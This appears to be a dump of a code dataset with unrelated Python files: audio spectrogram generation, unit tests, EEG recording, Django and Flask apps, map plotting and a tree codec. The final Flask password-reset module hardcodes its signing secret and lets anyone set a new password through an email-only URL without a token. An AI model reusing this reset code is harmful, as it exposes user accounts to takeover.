content
stringlengths 5
1.05M
|
|---|
import threading
import subprocess
import glob
import re
import operator
import pickle
from audio import spec2wav, wav2spec, read_wav, write_wav
import matplotlib.pyplot as plt
import numpy as np
sr = 22050
n_fft = 512
win_length = 400
hop_length = 80
duration = 2 # sec
# moving all data to one dir cd ~/Downloads/aclImdb/test/neg; tar -cf - * | (cd ~/Downloads/aclImdb/data; tar -xf -)
def wav_to_spec_inverted(file):
wav_x = read_wav(file, sr, duration)
spec_x, _ = wav2spec(wav_x, n_fft, win_length, hop_length, False)
spec_x_padding = np.array(spec_x[:, 0:300])
spec_x_padding /= np.max(spec_x_padding)
spec_x_padding.resize((257, 300))
return np.swapaxes( spec_x_padding, 0, 1 )
def save_obj(obj, name ):
with open('data/'+ name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name ):
with open('data/' + name + '.pkl', 'rb') as f:
return pickle.load(f)
def process_files(files, thread_id):
counter = 0
words = {}
for file in files :
with open(file) as f_pointer:
line = " ".join( f_pointer.readlines() )
cleaned_text = line.replace("<br />", " ").replace("/", " ").replace("\"", " ").replace("'", " ").replace("(", " ").replace("`", " ").replace("~", " ").replace("-", " ")
cleaned_text = cleaned_text.replace(")", " ").replace(",", " ").replace("“", " ").replace("‘", " ").replace(".", " ").replace("?", " ").replace("!", " ")
cleaned_text = cleaned_text.replace("$", " ")
cleaned_text = cleaned_text.replace(":", " ").replace(";", " ").replace("_", " ").replace("--", " ").replace("{", " ").replace("}", " ").replace("=", " ")
parts = cleaned_text.split(' ')
for part in parts:
part = part.strip().lower()
use_this = True
l = len(part)
if l == 0 or l > 25: use_this = False
elif part.startswith("http"): use_this = False
elif "*" in part: use_this = False
elif "--" in part: use_this = False
elif "\x97" in part: use_this = False
elif "\x85" in part: use_this = False
if use_this:
if part in words:
words[part] += 1
else:
words[part] = 1
counter += 1
# sorted_words = sorted(words.items(), key=operator.itemgetter(1))
#
# print( sorted_words[-100:])
# print( sorted_words[:200])
data1 = []
data2 = []
counter = 0
words_to_use = []
save_part_index = 0
for word in words:
count = words[word]
if count > 1:
try:
subprocess.check_output(
['say', '--file-format=WAVE', '--channels=1', '--data-format=LEF32@22050', '-o', '/tmp/1.wav', '-v', 'Ava', '-r', '175', word])
subprocess.check_output(
['say', '--file-format=WAVE', '--channels=1', '--data-format=LEF32@22050', '-o', '/tmp/2.wav', '-v', 'Serena', '-r', '175', word])
spec1 = wav_to_spec_inverted('/tmp/1.wav')
spec2 = wav_to_spec_inverted('/tmp/2.wav')
data1.append(spec1)
data2.append(spec2)
words_to_use.append(count)
counter += 1
except:
pass
if counter % 5000 == 0:
print("counter " + str(counter))
save_obj(words_to_use, "word_count_" + str(save_part_index))
np.save("data/data1_" + str(save_part_index), np.array(data1))
np.save("data/data2_" + str(save_part_index), np.array(data2))
data1 = []
data2 = []
words_to_use = []
save_part_index += 1
if len(data1) > 0:
save_obj(words_to_use, "word_count_" + str(save_part_index))
np.save("data/data1_" + str(save_part_index), np.array(data1))
np.save("data/data2_" + str(save_part_index), np.array(data2))
print("total words " + str(counter))
if __name__ == "__main__":
num_threads = 1
thread_pointers = [i for i in range(num_threads)]
files = glob.glob("/Users/henry/Downloads/aclImdb/data/*.txt")
print("Processing " + str(len(files)) + " files:")
files_per_part = int( len(files) / num_threads )
for i in range(num_threads):
some_files = files[i * files_per_part : (i+1) * files_per_part]
thread_pointers[i] = threading.Thread(target=process_files, args=(some_files, i))
for i in range(num_threads):
thread_pointers[i].start()
for i in range(num_threads):
thread_pointers[i].join()
print("Done!")
|
import unittest
from decimal import Decimal
from gsf.core.entity.core import Entity
from gsf.core.entity.properties import ExpressionProperty
from gsf.core.mathematics.values import Value
from gsf.dynamic_system.dynamic_systems import DiscreteEventDynamicSystem
from gsf.dynamic_system.future_event_list import Scheduler
from gsf.models.core import Path
from test.module_tests.mocks.dynamic_system_mock import DynamicSystemMock
from test.module_tests.mocks.model_mock import ModelMock
import numpy as np
class DiscreteEventDynamicSystemTest(unittest.TestCase):
"""Base dynamic system tests"""
dynamic_system: DiscreteEventDynamicSystem
def setUp(self) -> None:
"""Sets up tests"""
self.dynamic_system = DynamicSystemMock(Scheduler())
def tearDown(self) -> None:
"""Remove changes of the tests."""
Entity._saved_names = set()
def test_schedule(self):
"""Should schedule a model"""
m = ModelMock(self.dynamic_system)
self.dynamic_system.schedule(m, Decimal(10))
self.assertEqual(10, self.dynamic_system.get_time_of_next_events())
def test_get_next_models(self):
"""Should retrieve the next models"""
m1 = ModelMock(self.dynamic_system)
m2 = ModelMock(self.dynamic_system)
m3 = ModelMock(self.dynamic_system)
self.dynamic_system.schedule(m1, Decimal(10))
self.dynamic_system.schedule(m2, Decimal(10))
self.dynamic_system.schedule(m3, Decimal(11))
self.assertEqual({m1, m2}, self.dynamic_system.get_next_models())
def test_get_output(self):
"""Should retrieve the next models"""
m1 = ModelMock(self.dynamic_system)
self.dynamic_system.schedule(m1, Decimal(10))
m1.get_output = lambda: 5
self.assertDictEqual({m1: 5}, self.dynamic_system.get_output())
def test_get_effective_paths_ones(self):
"""Should get the valid paths for each output"""
m1 = ModelMock(self.dynamic_system)
m2 = ModelMock(self.dynamic_system)
m3 = ModelMock(self.dynamic_system)
m12 = Path(m1, m2, ExpressionProperty(Value(1)))
m13 = Path(m1, m3, ExpressionProperty(Value(1)))
m23 = Path(m2, m3, ExpressionProperty(Value(1)))
self.dynamic_system.link(m12)
self.dynamic_system.link(m13)
self.dynamic_system.link(m23)
m1.get_output = lambda: 5
m2.get_output = lambda: 15
m3.get_output = lambda: 25
self.dynamic_system.schedule(m1, Decimal(10))
self.dynamic_system.schedule(m2, Decimal(10))
self.dynamic_system.schedule(m3, Decimal(10))
self.dynamic_system.get_output()
self.assertEqual({m12, m13}, self.dynamic_system._get_effective_paths(m1))
self.assertEqual({m23}, self.dynamic_system._get_effective_paths(m2))
def test_get_effective_paths_probability(self):
"""Should get the valid paths for each output probability"""
m1 = ModelMock(self.dynamic_system)
m2 = ModelMock(self.dynamic_system)
m3 = ModelMock(self.dynamic_system)
m11 = Path(m1, m1, ExpressionProperty(Value(0.1)))
m12 = Path(m1, m2, ExpressionProperty(Value(0.3)))
m13 = Path(m1, m3, ExpressionProperty(Value(0.6)))
m23 = Path(m2, m3, ExpressionProperty(Value(1)))
self.dynamic_system.link(m11)
self.dynamic_system.link(m12)
self.dynamic_system.link(m13)
self.dynamic_system.link(m23)
m1.get_output = lambda: 5
m2.get_output = lambda: 15
m3.get_output = lambda: 25
self.dynamic_system.schedule(m1, Decimal(10))
self.dynamic_system.schedule(m2, Decimal(10))
self.dynamic_system.schedule(m3, Decimal(10))
self.dynamic_system.get_output()
self.assertEqual(1, len(self.dynamic_system._get_effective_paths(m1)))
self.assertEqual({m23}, self.dynamic_system._get_effective_paths(m2))
def test_get_affected_models_and_its_inputs(self):
"""Should get the affected models and its inputs"""
m1 = ModelMock(self.dynamic_system)
m2 = ModelMock(self.dynamic_system)
m3 = ModelMock(self.dynamic_system)
m12 = Path(m1, m2, ExpressionProperty(Value(1)))
m13 = Path(m1, m3, ExpressionProperty(Value(1)))
m23 = Path(m2, m3, ExpressionProperty(Value(1)))
np.random.seed(42)
self.dynamic_system.link(m12)
self.dynamic_system.link(m13)
self.dynamic_system.link(m23)
m1.get_output = lambda: 5
m2.get_output = lambda: 15
m3.get_output = lambda: 25
self.dynamic_system.schedule(m1, Decimal(10))
self.dynamic_system.schedule(m2, Decimal(10))
self.dynamic_system.schedule(m3, Decimal(10))
self.dynamic_system.get_output()
(
affected_models,
inputs,
) = self.dynamic_system._get_affected_models_and_its_inputs()
self.assertEqual({m2, m3}, affected_models)
self.assertDictEqual(
{m2: {m1.get_id(): 5}, m3: {m1.get_id(): 5, m2.get_id(): 15}}, inputs
)
if __name__ == "__main__":
unittest.main()
|
import numpy as np
import time
import scipy.io as sio
from ismore import brainamp_channel_lists
from riglib.brainamp.rda import *
fs = 1000
channels = brainamp_channel_lists.emg_eog2_eeg
total_time = 120 # how many secs of data to receive and save
n_samples = 2 * fs * total_time # allocate twice as much space as expected
n_chan = len(channels)
DATA = np.zeros((n_chan, n_samples))
idxs = np.zeros(n_chan, int)
chan_to_row = dict()
for row, chan in enumerate(channels):
chan_to_row[chan] = row
emgdata_obj = EMGData()
emgdata_obj.start()
start_time = time.time()
while (time.time() - start_time) < total_time:
chan, data = emgdata_obj.get()
row = chan_to_row[chan]
idx = idxs[row]
DATA[row, idx] = data['data']
idxs[row] += 1
save_dict = {'data': DATA}
sio.matlab.savemat('brainamp_data.mat', save_dict)
|
from Port import Port
import pytest
test_data = [('test1.txt',25,65),('test2.txt',5,127)]
test_data2 = [('test2.txt',5,62)]
@pytest.mark.parametrize("file_name,preamble_len,result",test_data)
def test_first_number_not_compliant(file_name,preamble_len,result):
port = Port(file_name,preamble_len)
assert port.first_number_not_compliant() == result
@pytest.mark.parametrize("file_name,preamble_len,result",test_data2)
def test_encryption_weakness(file_name,preamble_len,result):
port = Port(file_name,preamble_len)
assert port.encryption_weakness() == result
|
from django.urls import path
from django.contrib.auth.decorators import login_required
from django.views.generic import TemplateView
from . import views
from .views import upload
urlpatterns = [
path('', upload, name='upload'),
path('home/', login_required(views.home), name='home_page'),
path('predict/', login_required(views.prediction), name='prediction'),
]
|
#!/usr/bin/python3
HOST = '0.0.0.0'
PORT = 10000
FLAG_PATH = '/flag'
SOURCE_PATH = '/demo.sol'
CONTRACT_NAME = 'Challenge'
EVENT_NAME = 'GetFlag'
INFURA_PROJECT_ID = ''
|
# -*- coding: utf-8 -*-
# (c) Copyright IBM Corp. 2010, 2019. All Rights Reserved.
# pragma pylint: disable=unused-argument, no-self-use, line-too-long
"""Feed component implementation."""
import logging
import sys
import traceback
from pydoc import locate
from resilient_circuits import ResilientComponent, handler, ActionMessage
from resilient_lib import str_to_bool, get_file_attachment
from resilient import SimpleHTTPException
from rc_data_feed.lib.type_info import FullTypeInfo, ActionMessageTypeInfo
from rc_data_feed.lib.feed import FeedContext
from rc_data_feed.lib.rest_client_helper import RestClientHelper
LOG = logging.getLogger(__name__)
def _get_inc_id(payload):
if 'incident' in payload:
return payload['incident']['id']
return None
def _is_incident_or_task(parent_types):
return {'incident', 'task'}.intersection(parent_types)
def build_feed_outputs(rest_client_helper, opts, feed_names):
"""
build array of all the classes which of datastores to populate
:param rest_client_helper:
:param opts:
:param feed_names:
:return: array of datastore classes
"""
feed_config_names = [name.strip() for name in feed_names.split(',')]
feed_outputs = list()
for feed_config_name in feed_config_names:
feed_options = opts.get(feed_config_name, {})
class_name = feed_options.get("class")
namespace = 'data_feeder_plugins.{ns}.{ns}.{claz}Destination'.format(ns=class_name.lower(), claz=class_name)
LOG.debug(namespace)
obj = locate(namespace)(rest_client_helper, feed_options)
feed_outputs.append(obj)
return feed_outputs
def range_chunks(chunk_range, chunk_size):
"""
build array of lists to break of queries into smaller chunks
:param chunk_range:
:param chunk_size:
:return:
"""
if isinstance(chunk_range, list):
start = chunk_range[0]-1
stop = chunk_range[-1]
else:
start = chunk_range.start - 1
stop = chunk_range.stop
while start <= stop:
yield (start + 1, min(stop, start + chunk_size))
start += chunk_size
def send_data(type_info, inc_id, rest_client_helper, payload,\
feed_outputs, is_deleted, incl_attachment_data):
"""
perform the sync to the different datastores
:param type_info:
:param inc_id:
:param rest_client:
:param payload:
:param feed_outputs:
:param is_deleted: true/false
:param incl_attachment_data: true/false
:return: None
"""
context = FeedContext(type_info, inc_id, rest_client_helper.inst_rest_client, is_deleted)
type_name = type_info.get_pretty_type_name()
# make sure the incident has a org_name
if type_name == 'incident':
payload['org_name'] = type_info.get_org_name(payload['org_id'])
# collect attachment data to pass on
elif not is_deleted and incl_attachment_data \
and type_name == 'attachment':
# this will return a byte string
payload['content'] = get_file_attachment(rest_client_helper.inst_rest_client, inc_id,
task_id=payload.get('task_id'),
attachment_id=payload['id'])
elif not is_deleted and incl_attachment_data \
and type_name == 'artifact' \
and payload.get('attachment'):
# this will return a byte string
payload['content'] = get_file_attachment(rest_client_helper.inst_rest_client, inc_id,
artifact_id=payload['id'])
for feed_output in feed_outputs:
# don't let a failure in one feed break all the rest
try:
LOG.debug("Calling feed %s", feed_output.__class__.__name__)
feed_output.send_data(context, payload)
except Exception as err:
LOG.error("Failure in update to %s %s", feed_output.__class__.__name__, err)
error_trace = traceback.format_exc()
LOG.error("Traceback %s", error_trace)
class FeedComponent(ResilientComponent):
"""This component handles initial population of a feed and ongoing
modifications from the associated queue."""
DATATABLE_TYPE_ID = 8
INCIDENT_TYPE_ID = 0
INC_PAGE_SIZE = 500
SEARCH_PAGE_SIZE = 50
"""Component that ingests data"""
def __init__(self, opts):
super(FeedComponent, self).__init__(opts)
try:
self.options = opts.get("feeds", {})
LOG.debug(self.options)
self.channel = "actions." + self.options.get("queue", "feed_data")
if self.options.get("feed_names") is None:
LOG.error("No feed_names are specified")
else:
rest_client_helper = RestClientHelper(self.rest_client)
self.feed_outputs = build_feed_outputs(rest_client_helper, opts, self.options.get("feed_names", None))
# expose attachment content setting
self.incl_attachment_data = str_to_bool(self.options.get("include_attachment_data", 'false'))
# determine the reload options to follow
if str_to_bool(self.options.get('reload', 'false')):
query_api_method = str_to_bool(self.options.get("reload_query_api_method", 'false'))
reload_feeds = Reload(rest_client_helper, self.feed_outputs,
query_api_method=query_api_method,
incl_attachment_data=self.incl_attachment_data)
reload_feeds.reload_all()
except Exception as err:
LOG.error("exception: %s", err)
error_trace = traceback.format_exc()
LOG.error("Traceback %s", error_trace)
@handler()
def _feed_ingest_data(self, event, *args, **kwargs): # pylint: disable=unused-argument
"""Ingests data of any type that can be sent to a Resilient message destination"""
if not isinstance(event, ActionMessage):
# Some event we are not interested in
return
try:
log = logging.getLogger(__name__)
log.info("ingesting object")
rest_client_helper = RestClientHelper(self.rest_client)
type_info = ActionMessageTypeInfo(event.message['object_type'],
event.message['type_info'],
rest_client_helper.inst_rest_client)
type_name = type_info.get_pretty_type_name()
inc_id = _get_inc_id(event.message)
is_deleted = event.message['operation_type'] == 'deleted'
if type_info.is_data_table():
payload = event.message['row']
else:
payload = event.message[type_name]
send_data(type_info, inc_id, rest_client_helper, payload,
self.feed_outputs, is_deleted, self.incl_attachment_data)
except Exception as err:
error_trace = traceback.format_exc()
LOG.error("Traceback %s", error_trace)
LOG.error("Failure on action %s object %s type_info %s",
event.message['operation_type'], event.message['object_type'], event.message['type_info'])
class Reload(object):
def __init__(self, rest_client_helper, feed_outputs,\
query_api_method=False, incl_attachment_data=False):
"""
:param rest_client: not the instance as we may need to refresh the client at a later point
:param feed_outputs:
:param query_api_method:
:param incl_attachment_data: true/false
"""
self.rest_client_helper = rest_client_helper
self.feed_outputs = feed_outputs
self.query_api_method = query_api_method
self.incl_attachment_data = incl_attachment_data
self.init_type_info()
self.lookup = {
"attachment": self._query_attachment,
"artifact": self._query_artifact,
"datatable": self._query_datatable,
"milestone": self._query_milestone,
"note": self._query_note,
"task": self._query_task,
"__emailmessage": None
}
def init_type_info(self):
# We want to search all of the types that have incident or task as a parent.
self.type_info_index = {}
self.search_type_names = ['datatable']
for (type_name, type_dto) in list(self.rest_client_helper.get("/types").items()):
parent_types = set(type_dto['parent_types'])
if type_name == 'incident' or _is_incident_or_task(parent_types):
real_id = type_dto['id']
name = type_dto['type_name']
type_id = type_dto['type_id']
info = FullTypeInfo(real_id,
self.rest_client_helper,
refresh=False,
all_fields=list(type_dto['fields'].values()))
# Index by both name and ID.
self.type_info_index[real_id] = info
self.type_info_index[name] = info
if type_id not in [FeedComponent.DATATABLE_TYPE_ID, FeedComponent.INCIDENT_TYPE_ID]:
self.search_type_names.append(name)
def reload_all(self, min_inc_id=0, max_inc_id=sys.maxsize):
"""
load incidents and related notes, tasks, artifacts, etc based on min and max values
:param min_inc_id: defaults to 0 for all incidents
:param max_inc_id: defaults to max number for all incidents
:return: # of incidents sync'd
"""
actual_max_inc_id, actual_min_inc_id = self._populate_incidents(self.type_info_index, min_inc_id, max_inc_id,
self.query_api_method)
if not self.query_api_method:
rng = range(actual_min_inc_id, actual_max_inc_id)
self._populate_others(rng, self.search_type_names, self.type_info_index)
return 0 if actual_max_inc_id == 0 else (actual_max_inc_id - actual_min_inc_id) + 1
def _populate_incidents(self, type_info_index, min_inc_id, max_inc_id, query_api_method):
"""
:param type_info_index:
:param min_inc_id:
:param max_inc_id:
:param query_api_method:
:return:
"""
actual_min_inc_id = sys.maxsize
actual_max_inc_id = 0
try:
for incident in self._page_incidents(min_inc_id, max_inc_id):
inc_id = incident['id']
actual_min_inc_id = min(actual_min_inc_id, inc_id)
actual_max_inc_id = max(actual_max_inc_id, inc_id)
type_info = type_info_index[FeedComponent.INCIDENT_TYPE_ID]
send_data(type_info, inc_id, self.rest_client_helper, incident,
self.feed_outputs, False, self.incl_attachment_data)
# query api call should be done now
if query_api_method:
self._populate_others_query(inc_id,
self.search_type_names,
self.type_info_index)
except StopIteration:
pass
return actual_max_inc_id, actual_min_inc_id
def _populate_others(self,
inc_range,
search_type_names,
type_info_index):
for chunk in range_chunks(inc_range, FeedComponent.SEARCH_PAGE_SIZE):
# Handle all the other built-in types using the search endpoint (except
# the incident type, which was already handled above. Make sure we only
self._populate_others_chunk(chunk, search_type_names, type_info_index)
def _populate_others_chunk(self, chunk, search_type_names, type_info_index):
# get data for our org.
#
search_input_dto = {
'query': 'inc_id:[{0} TO {1}]'.format(chunk[0], chunk[1]),
'types': search_type_names,
'org_id': self.rest_client_helper.get_inst_rest_client().org_id
}
search_results = self.rest_client_helper.search(search_input_dto)
for result in search_results['results']:
# We're not consistent about returning IDs vs names of types. The search
# results are returning the type name (even though it's called "type_id").
type_name = result['type_id']
result_data = result['result']
if type_name == 'datatable':
# We need the ID of the table, not the ID for the generic "datatable" type.
type_id = result_data['type_id']
type_info = type_info_index[type_id]
else:
type_info = type_info_index[type_name]
inc_id = result['inc_id']
send_data(type_info, inc_id, self.rest_client_helper, result_data,
self.feed_outputs, False, self.incl_attachment_data)
def _populate_others_query(self,
inc_id,
object_type_names,
type_info_index):
# ensure the incident is found
try:
_incident = self.rest_client_helper.get("/incidents/{}".format(inc_id))
for object_type in object_type_names:
if not self.lookup.get(object_type):
LOG.error("Method for synchronization not found: %s", object_type)
else:
try:
type_info = type_info_index.get(object_type, None) # datatables will not have a type_info object at this time
sync_count = self.lookup[object_type](self.rest_client_helper, inc_id, type_info)
LOG.debug("inc_id: %s %s : %s", inc_id, object_type, sync_count)
except AttributeError:
LOG.error("Query error for synchronization method: %s", object_type)
except SimpleHTTPException:
pass
def _query_artifact(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/artifacts".format(inc_id)
item_list = rest_client_helper.get(query)
for item in item_list:
send_data(type_info, inc_id, rest_client_helper,
item, self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_milestone(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/milestones".format(inc_id)
item_list = rest_client_helper.get(query)
for item in item_list:
send_data(type_info, inc_id, rest_client_helper, item,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_note(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/comments".format(inc_id)
item_list = rest_client_helper.get(query)
for item in item_list:
send_data(type_info, inc_id, rest_client_helper, item,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_task(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/tasks".format(inc_id)
item_list = rest_client_helper.get(query)
for item in item_list:
send_data(type_info, inc_id, rest_client_helper, item,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_attachment(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/attachments/query?include_tasks=true".format(inc_id)
item_list = rest_client_helper.post(query, None)
for item in item_list['attachments']:
send_data(type_info, inc_id, rest_client_helper, item,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_datatable(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/table_data".format(inc_id)
item_list = rest_client_helper.get(query)
for _, table in item_list.items():
# We need the ID of the table, not the ID for the generic "datatable" type.
type_id = table['id']
type_info = self.type_info_index[type_id]
for row in table['rows']:
send_data(type_info, inc_id, rest_client_helper, row,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _page_incidents(self, min_inc_id, max_inc_id):
query = {
'start': 0,
'length': FeedComponent.INC_PAGE_SIZE,
'sorts': [
{
'field_name': 'id',
'type': 'asc'
}
]
}
conditions = []
if min_inc_id:
condition = {
"method": "gte",
"field_name": "id",
"value": min_inc_id
}
conditions.append(condition)
if conditions:
query['filters'] = [{
"conditions": conditions
}]
LOG.debug("query filter: %s", query)
url = '/incidents/query_paged?return_level=full'
paged_results = self.rest_client_helper.post(url, query)
while paged_results.get('data'):
data = paged_results.get('data')
for result in data:
if result['id'] <= max_inc_id:
yield result
query['start'] = len(data) + query['start']
paged_results = self.rest_client_helper.post(url, query)
|
#!/usr/bin/env python
# encoding: utf-8
# Copyright (c) 2021 Grant Hadlich
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import geopandas
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
from shapely.geometry import Polygon
import numpy as np
from tqdm.auto import tqdm
state_image_list = {
"Alabama" : "AL.png",
"Alaska" : "AK.png",
"Arizona" : "AZ.png",
"Arkansas" : "AR.png",
"California" : "CA.png",
"Colorado" : "CO.png",
"Connecticut" : "CT.png",
"Delaware" : "DE.png",
"Florida" : "FL.png",
"Georgia" : "GA.png",
"Hawaii" : "HI.png",
"Idaho" : "ID.png",
"Illinois" : "IL.png",
"Indiana" : "IN.png",
"Iowa" : "IA.png",
"Kansas" : "KS.png",
"Kentucky" : "KY.png",
"Louisiana" : "LA.png",
"Maine" : "ME.png",
"Maryland" : "MD.png",
"Massachusetts" : "MA.png",
"Michigan" : "MI.png",
"Minnesota" : "MN.png",
"Mississippi" : "MS.png",
"Missouri" : "MO.png",
"Montana" : "MT.png",
"Nebraska" : "NE.png",
"Nevada" : "NV.png",
"New Hampshire" : "NH.png",
"New Jersey" : "NJ.png",
"New Mexico" : "NM.png",
"New York" : "NY.png",
"North Carolina" : "NC.png",
"North Dakota" : "ND.png",
"Ohio" : "OH.png",
"Oklahoma" : "OK.png",
"Oregon" : "OR.png",
"Pennsylvania" : "PA.png",
"Rhode Island" : "RI.png",
"South Carolina" : "SC.png",
"South Dakota" : "SD.png",
"Tennessee" : "TN.png",
"Texas" : "TX.png",
"Utah" : "UT.png",
"Vermont" : "VT.png",
"Virginia" : "VA.png",
"Washington" : "WA.png",
"West Virginia" : "WV.png",
"Wisconsin" : "WI.png",
"Wyoming" : "WY.png",
"District of Columbia" : "DC.png",
}
if __name__ == "__main__":
# Construct Output File
directory = "./state_images"
for state in tqdm(state_image_list, total=len(state_image_list), position=0, leave=True):
output_file = os.path.join(directory, state_image_list[state])
""" Takes in a map by state name with some decimal percentage as the value to plot on US Map """
states = geopandas.read_file("./data/cb_2018_us_state/cb_2018_us_state_500k.shp")
# Get States
m = states['NAME'] == state
# Create polygon that is the area of interest
if state == "Hawaii":
target_poly = Polygon([(-162, 23), (-162, 15),
(-154, 15), (-154, 23)])
else:
target_poly = Polygon([(-179.9, 18), (-179.9, 89),
(-65, 89), (-65, 18)])
# Collect States for Plot
conus = states[m]
# Clip the Map
conus_clipped = conus.copy()
conus_clipped['geometry'] = conus.intersection(target_poly)
conus = conus_clipped[conus_clipped['geometry'] != Polygon()]
# Create Initial Plot
us_map = conus.plot(figsize=(15, 8))
#us_map = conus.plot()
# Create and Save the Plot
us_map.axis('off')
fig = us_map.get_figure()
fig.tight_layout()
fig.savefig(output_file)
# Create Conus
output_file = os.path.join(directory, "US.png")
""" Takes in a map by state name with some decimal percentage as the value to plot on US Map """
states = geopandas.read_file("./data/cb_2018_us_state/cb_2018_us_state_500k.shp")
# Shift Alaska
m = states['NAME'] == 'Alaska'
states[m] = states[m].set_geometry(states[m].translate(-75, -39).scale(.3,.5))
# Shift Hawaii
m = states['NAME'] == 'Hawaii'
states[m] = states[m].set_geometry(states[m].translate(44,5).scale(1.7,1.7))
# Shift DC
m = states['NAME'] == 'District of Columbia'
states[m] = states[m].set_geometry(states[m].translate(5,-3).scale(16,16))
# Collect States for Plot
conus = states[~states['STUSPS'].isin(['PR', "AS", "VI", "MP", "GU"])]
# Create polygon that is the area of interest
target_poly = Polygon([(-125, 18), (-125, 52),
(-65, 52), (-65, 18)])
# Clip the Map
conus_clipped = conus.copy()
conus_clipped['geometry'] = conus.intersection(target_poly)
conus = conus_clipped[conus_clipped['geometry'] != Polygon()]
# Create Initial Plot
us_map = conus.plot(figsize=(15, 8))
# Create and Save the Plot
us_map.axis('off')
fig = us_map.get_figure()
fig.tight_layout()
fig.savefig(output_file)
|
from datetime import tzinfo, timedelta, datetime
from django.core.management.base import BaseCommand, CommandError
from orders.models import subscription_product
from invoice.models import Invoice
#python manage.py checksubscription 2016-11-10
class Command(BaseCommand):
help = 'Check for expiry of subscriptions'
def add_arguments(self, parser):
parser.add_argument('run_date', nargs='+', type=str)
def handle(self, *args, **options):
for run_date in options['run_date']:
self.stdout.write(self.style.SUCCESS('Date: "%s"' % datetime.strptime(run_date, "%Y-%m-%d")))
scn_products = subscription_product.objects.filter(expiration_date__lte = datetime.strptime(run_date, "%Y-%m-%d"))
for scn_item in scn_products:
now = datetime.now()
inv_num = now.strftime("%d%m%Y%S%M%H%f")
inv = Invoice(invoice_number = inv_num, title = scn_item.title, due_date = scn_item.expiration_date, customer = scn_item.customer, subscription = scn_item, description = scn_item.title, status = True)
inv.save()
self.stdout.write(self.style.SUCCESS('Invoice: "%s"' % inv_num))
self.stdout.write(self.style.SUCCESS('Subscription: "%s"' % scn_item.title))
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
"""
timecomplexity= O(n) spacecomplexity = O(n)
serialize
construct recusive function to covert tree into string replace None by '# ' and use ' ' to separate each node
deserialize
At first, define a list which element is from the string split ' ', then check special tase if len is 0 or only '#' in the List
construct recusive function to get tree node from the List by pop the [0] from it.
"""
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
def rserialize(root,string):
if root == None:
string += '# '
else:
string += str(root.val) + ' '
string = rserialize(root.left,string)
string = rserialize(root.right, string)
return string
string = rserialize(root, '')
return string
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
def rdeserialize(l):
if len(l) == 0:
return
if l[0] == '#':
l.pop(0)
return None
root = TreeNode(l[0])
l.pop(0)
root.left = rdeserialize(l)
root.right = rdeserialize(l)
return root
data_list = data.split(' ')
return rdeserialize(data_list)
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
|
""" Module related to forgot password"""
from flask import Blueprint, flash, url_for, render_template
from itsdangerous import URLSafeTimedSerializer
from werkzeug.security import generate_password_hash
from werkzeug.utils import redirect
from auth.forms import ForgotForm, ResetForm
from auth.helpers import find_user_active, send_forgot_email, find_user, update_user
forgot_bp = Blueprint("forgot", __name__, url_prefix="/forgot") # pylint: disable=invalid-name
secret_key = "kasia" # TODO fix this
@forgot_bp.route("/", methods=["GET", "POST"])
def forgot():
"""Send email to reset password
:return: redirect to home or reset_password
"""
form = ForgotForm()
if form.validate_on_submit():
email = form.email.data
user = find_user_active(email, True)
if user is None:
flash("No such user in the database", "danger")
return redirect(url_for("main.home"))
send_forgot_email(email, user["name"])
flash(f"Email to {email}send", "success")
return redirect(url_for("main.home"))
return render_template("reset_password.html", form=form)
@forgot_bp.route("/reset/<token>")
def reset_password(token):
"""Reset password
:param token: token to reset password
:return: redirect to index or Bad request
"""
try:
forgot_serializer = URLSafeTimedSerializer(secret_key)
email = forgot_serializer.loads(token, salt='email-reset-salt', max_age=5400)
except: # pylint: disable=bare-except
return "The reset link is invalid or has expired."
if find_user(email, ""):
user = find_user_active(email, False)
if not user:
return redirect(url_for("forgot.reset_password_form", email=email))
flash(f"Email {email} is not registered", "danger")
return redirect(url_for("main.home"))
flash(f"Email {email} not in the database", "danger")
return redirect(url_for("main.home"))
@forgot_bp.route("/reset/form/<email>", methods=["GET", "POST"])
def reset_password_form(email):
"""Set new password
:param email: user's email
:return: redirect to index or Bad request
"""
form = ResetForm()
if form.validate_on_submit():
new_password = form.new_password.data
confirm_password = form.confirm_password.data
user = find_user_active(email, True)
if user is None:
flash("No such user in the database", "danger")
return redirect(url_for("main.home"))
if new_password != confirm_password:
flash("Passwords do not match", "danger")
return render_template("new_password.html", form=form, email=email)
update_user(user, {"$set": {"password": generate_password_hash(new_password)}})
flash(f"Password has been changed", "success")
return redirect(url_for("main.home"))
